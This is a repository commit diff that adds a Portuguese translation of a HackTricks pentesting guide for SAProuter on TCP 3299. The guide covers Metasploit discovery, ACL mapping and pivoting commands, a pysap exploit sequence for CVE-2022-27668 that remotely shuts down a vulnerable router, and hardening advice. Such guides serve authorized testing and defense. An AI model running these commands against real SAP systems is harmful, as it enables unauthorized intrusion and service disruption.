maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/3299-pentesting-saprouter.m

Browse Source
This commit is contained in:
Translator 2025-08-14 06:15:57 +00:00
parent 73502f98e8
commit e8fd656218
1 changed files with 68 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

73
src/network-services-pentesting/3299-pentesting-saprouter.md
View File

@ -1,3 +1,5 @@
# # 3299/tcp - Pentesting SAProuter
{{#include ../banners/hacktricks-training.md}}
```text
PORT STATE SERVICE VERSION
@ -7,11 +9,11 @@ Este é um resumo do post de [https://blog.rapid7.com/2014/01/09/piercing-saprou
## Compreendendo a Penetração do SAProuter com Metasploit
O SAProuter atua como um proxy reverso para sistemas SAP, principalmente para controlar o acesso entre a internet e redes internas SAP. Ele é comumente exposto à internet permitindo a passagem da porta TCP 3299 através dos firewalls organizacionais. Essa configuração torna o SAProuter um alvo atraente para pentesting, pois pode servir como um gateway para redes internas de alto valor.
O SAProuter atua como um proxy reverso para sistemas SAP, principalmente para controlar o acesso entre a internet e redes internas SAP. Ele é comumente exposto à internet permitindo a passagem da porta TCP 3299 através de firewalls organizacionais. Essa configuração torna o SAProuter um alvo atraente para pentesting, pois pode servir como um gateway para redes internas de alto valor.
**Escaneamento e Coleta de Informações**
Inicialmente, um escaneamento é realizado para identificar se um roteador SAP está em execução em um determinado IP usando o módulo **sap_service_discovery**. Esta etapa é crucial para estabelecer a presença de um roteador SAP e sua porta aberta.
Inicialmente, um escaneamento é realizado para identificar se um SAP router está em execução em um determinado IP usando o módulo **sap_service_discovery**. Esta etapa é crucial para estabelecer a presença de um SAP router e sua porta aberta.
```text
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
@ -34,7 +36,7 @@ A flexibilidade deste módulo em direcionar instâncias e portas SAP específica
**Enumeração Avançada e Mapeamento de ACL**
Escaneamentos adicionais podem revelar como as Listas de Controle de Acesso (ACLs) estão configuradas no SAProuter, detalhando quais conexões são permitidas ou bloqueadas. Esta informação é fundamental para entender as políticas de segurança e as potenciais vulnerabilidades.
A varredura adicional pode revelar como as Listas de Controle de Acesso (ACLs) estão configuradas no SAProuter, detalhando quais conexões são permitidas ou bloqueadas. Esta informação é fundamental para entender as políticas de segurança e as potenciais vulnerabilidades.
```text
msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
@ -45,7 +47,7 @@ Em cenários onde as informações diretas do SAProuter são limitadas, técnica
**Aproveitando Informações para Testes de Penetração**
Após mapear a rede e identificar serviços acessíveis, os testadores de penetração podem utilizar as capacidades de proxy do Metasploit para pivotar através do SAProuter para uma exploração e exploração adicionais de serviços SAP internos.
Tendo mapeado a rede e identificado serviços acessíveis, os testadores de penetração podem utilizar as capacidades de proxy do Metasploit para pivotar através do SAProuter para uma exploração e exploração adicionais de serviços SAP internos.
```text
msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
@ -55,11 +57,72 @@ msf auxiliary(sap_hostctrl_getcomputersystem) > run
Esta abordagem destaca a importância de configurações seguras do SAProuter e ressalta o potencial de acesso a redes internas por meio de testes de penetração direcionados. Proteger adequadamente os roteadores SAP e entender seu papel na arquitetura de segurança da rede é crucial para proteger contra acessos não autorizados.
Para informações mais detalhadas sobre módulos do Metasploit e seu uso, visite [Rapid7's database](http://www.rapid7.com/db).
Para informações mais detalhadas sobre módulos do Metasploit e seu uso, visite [o banco de dados da Rapid7](http://www.rapid7.com/db).
---
## Vulnerabilidades Recentes (2022-2025)
### CVE-2022-27668 Controle de Acesso Inadequado ➜ Execução Remota de Comandos Administrativos
Em junho de 2022, a SAP lançou a Nota de Segurança **3158375** abordando uma falha crítica (CVSS 9.8) no SAProuter (todos os kernels ≥ 7.22). Um atacante não autenticado pode abusar de entradas permissivas `saprouttab` para **enviar pacotes de administração** (por exemplo, *shutdown*, *trace-level*, *connection-kill*) de um host remoto, mesmo quando o roteador foi iniciado sem a opção de administração remota `-X`.
O problema resulta da possibilidade de construir um túnel para a própria interface de loopback do roteador, direcionando-se para o endereço não especificado **0.0.0.0**. Uma vez que o túnel é estabelecido, o atacante ganha privilégios de host local e pode executar qualquer comando administrativo.
A exploração prática pode ser reproduzida com o framework **pysap**:
```bash
# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0 -r 3299 \
-a 127.0.0.1 -l 3299 -v
# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299
```
**Versões afetadas**
* SAProuter autônomo 7.22 / 7.53
* Kernel 7.49, 7.77, 7.81, 7.857.88 (incl. KRNL64NUC/UC)
**Correção / Mitigação**
1. Aplique o patch entregue com a Nota SAP **3158375**.
2. Remova alvos curinga (`*`) das linhas `P` e `S` em `saprouttab`.
3. Certifique-se de que o roteador seja iniciado **sem** a opção `-X` e **não** esteja exposto diretamente à Internet.
---
## Ferramentas & Truques Atualizados
* **pysap** mantido ativamente e fornece `router_portfw.py`, `router_admin.py` & `router_trace.py` para criar pacotes NI/Roteador personalizados, fuzzing de ACLs ou automatizar a exploração do CVE-2022-27668.
* **Nmap** estenda a detecção de serviços adicionando a sonda SAProuter personalizada:
```text
Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
```
Combine com scripts NSE ou `--script=banner` para identificar rapidamente versões que vazam a string do banner (`SAProuter <ver> on '<host>'`).
* **Metasploit** os módulos auxiliares mostrados acima ainda funcionam através de um proxy SOCKS ou NI criado com pysap, permitindo integração total com o framework mesmo quando o roteador bloqueia o acesso direto.
---
## Lista de Verificação de Dureza & Detecção
* Filtre a porta **3299/TCP** no firewall de perímetro permita tráfego apenas de redes de suporte SAP confiáveis.
* Mantenha o SAProuter **totalmente atualizado**; verifique com `saprouter -v` e compare com o nível de patch do kernel mais recente.
* Use entradas **estritas e específicas para o host** em `saprouttab`; evite curingas `*` e negue regras `P`/`S` que visem hosts ou portas arbitrárias.
* Inicie o serviço com **`-S <secudir>` + SNC** para impor criptografia e autenticação mútua.
* Desative a administração remota (`-X`) e, se possível, vincule o listener a `127.0.0.1` enquanto usa um proxy reverso externo para o tráfego necessário.
* Monitore o log **dev_rout** para pacotes `ROUTER_ADM` suspeitos ou solicitações `NI_ROUTE` inesperadas para `0.0.0.0`.
---
## **Referências**
- [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
- [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
## Shodan